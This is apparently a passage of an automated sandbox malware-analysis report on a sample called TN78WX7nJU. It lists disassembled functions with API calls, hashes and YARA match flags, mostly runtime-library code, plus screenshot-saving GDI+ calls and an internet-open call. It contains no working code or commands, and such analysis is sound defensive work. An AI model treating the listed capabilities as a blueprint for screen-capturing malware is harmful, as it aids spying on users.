Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: FC71D271900216DBDB21CF99C8A4ABFBBB5FF7532CF54422BE41157280DB718982CBA0

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 024B0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

_free.LIBCMT ref: 024B0DB6
_free.LIBCMT ref: 024B0DCD
_free.LIBCMT ref: 024B0DEC
_free.LIBCMT ref: 024B0E07
_free.LIBCMT ref: 024B0E1E

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 3d5ce12d85e78b1ec7b6ee11579a03264736c9aab66c48f996b3922d2aa94c6f
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 51519331A003049FDB229F2AD841BAB77F9EF48725F14556EE809D7290E731E901CBA0

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024B1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024B17B4
_free.LIBCMT ref: 024B17D4

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 24c77b10373240b01ca32d40b18eb60aebc2178b60da524a0c763016ee606016
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 8241DE36A002049FCB21DF79C890A9EB7E6EF88714B1545AAE909EB381D731E901CB90

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0249B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0249B152

Part of subcall function 02491188: _SpinWait.LIBCONCRT ref: 024911A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0249B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0249B198
List.LIBCMT ref: 0249B21B
List.LIBCMT ref: 0249B22A

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: a858becbfef2f2573ea93ae7eeb81ac6a0ebc75d52e539bd824adb0aaf9d6891
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 79316432A00616DFCF11EFA5E9816EEBBB2FF04348B04406FC8156B680CB716A44CF90

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024850C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024850A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024850B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
__Getcoll.LIBCPMT ref: 0248512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: d8405f890bf42eb45cf1f74c1b39c6b03fa0b3ce4559dc9160be1f10f8ab27f2
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: DB2189B2824204AFDB05FFA5C484BEDBBB1BF50715F91800FE485AB280EB749544CFA1

Function 024B21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0248DAD7,0248DAD7,00000002,024AED35,024B3951,00000000,?,024A6A05,00000002,00000000,00000000,00000000,?,0248CF88,0248DAD7,00000004), ref: 024B21CA
_free.LIBCMT ref: 024B21FF
_free.LIBCMT ref: 024B2226
SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B2233
SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B223C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 9f751a2d77698e7bc85e95714a32160c9d74b9882ae28fb9d16b69a7154dee3e
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: DC01D6366457007B931BAB365C44EEB262AAFD1B72B10012BFC15D6391EFE089128539

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024B2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
_free.LIBCMT ref: 024B2178
_free.LIBCMT ref: 024B21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 37aa7fd9bfcec6ab2cbedbe0f568f767f4d3db8be227dfbee11a694161e908fe
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: D0F0A9352447003BD3176736AC08BDB262A5FC2F62F15022BFD19923A0EFE18512853A

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 02497B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024929A4: TlsGetValue.KERNEL32(?,?,02490DC2,02492ECF,00000000,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02497BB1

Part of subcall function 024A121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024A1241
Part of subcall function 024A121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024A125A
Part of subcall function 024A121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024A12D0
Part of subcall function 024A121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024A12D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02497BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02497BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02497BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02497BF1

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: a83c842435ca6e27417826ba7a964d08c1b266a7805b9cdadba250df14e66252
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 62F0C2716002186BCF15F677982096EFF2BDF90B18B04426FD80053350DF65DA058FD1

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 024BA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024BA0C4

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA0D6
_free.LIBCMT ref: 024BA0E8
_free.LIBCMT ref: 024BA0FA
_free.LIBCMT ref: 024BA10C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 654b7c37884042a49afc0c137c61ddce4079d8ff2257fe4b2a94b73b21beabda
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: ACF06232505220AB8672EF66E8C6C8777DAAE04750B64095BF048D7B11CB71F8A09E79

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024B1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B19AF

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024B19C1
_free.LIBCMT ref: 024B19D4
_free.LIBCMT ref: 024B19E5
_free.LIBCMT ref: 024B19F6

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: fb1bb5be7febef862022fbb464458d35641d881de5064fe1cdfc8ab087246599
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: D8F03070D003509B9F726F26AD804453F61AF09B2270002ABF406977B2C774E862EFAE

Function 0249CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0249CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0249CF67
GetCurrentThread.KERNEL32 ref: 0249CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0249CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0249CF8C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 634eb2d87e94ed821d7307fdc3aea86e6dd17fac859f214e31ef4a9a8b1c95f7
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 7FF01236200500DBCE25FF62E690ABABFA6AFC8610310455FD58B07594DF25A946DB61

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 02482E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482E8E

Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481328
Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481344

